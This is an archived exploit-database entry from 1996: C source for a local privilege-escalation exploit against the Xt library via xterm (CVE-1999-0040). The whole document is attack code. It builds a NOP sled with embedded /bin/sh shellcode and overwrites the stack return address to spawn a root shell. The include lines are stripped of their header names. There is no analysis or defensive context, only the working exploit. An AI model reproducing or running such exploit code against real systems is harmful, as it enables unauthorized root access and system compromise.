Xt Library - Local Privilege Escalation - CVE-1999-0040

1. #include
2. #include
3. #include
4.  
5. #define DEFAULT_OFFSET          0
6. #define BUFFER_SIZE             1491
7.  
8. long get_esp(void)
9. {
10.    __asm__("movl %esp,%eax\n");
11. }
12.  
13. main(int argc, char **argv)
14. {
15.    char *buff = NULL;
16.    unsigned long *addr_ptr = NULL;
17.    char *ptr = NULL;
18.  
19.    char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
20.    "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
21.    "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
22. "\xeb\x18"
23.    "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
24.    "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
25.  
26.    int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;
27.  
28.    if(argc>1)
29.         ofs=atoi(argv[1]);
30.    if(argc>2)
31.         bs=atoi(argv[2]);
32.    printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
33.         ofs, get_esp()+ofs, bs);
34.  
35.    buff = malloc(4096);
36.    if(!buff)
37.    {
38.       printf("can't allocate memory\n");
39.       exit(0);
40.    }
41.    ptr = buff;
42.    memset(ptr, 0x90, bs-strlen(execshell));
43.    ptr += bs-strlen(execshell);
44.    for(i=0;i < strlen(execshell);i++)
45.       *(ptr++) = execshell[i];
46.    addr_ptr = (long *)ptr;
47.    for(i=0;i < (8/4);i++)
48.       *(addr_ptr++) = get_esp() + ofs;
49.    ptr = (char *)addr_ptr;
50.    *ptr = 0;
51.    execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
52. }
53.  
54.  
55. // milw0rm.com [1996-08-24]
56.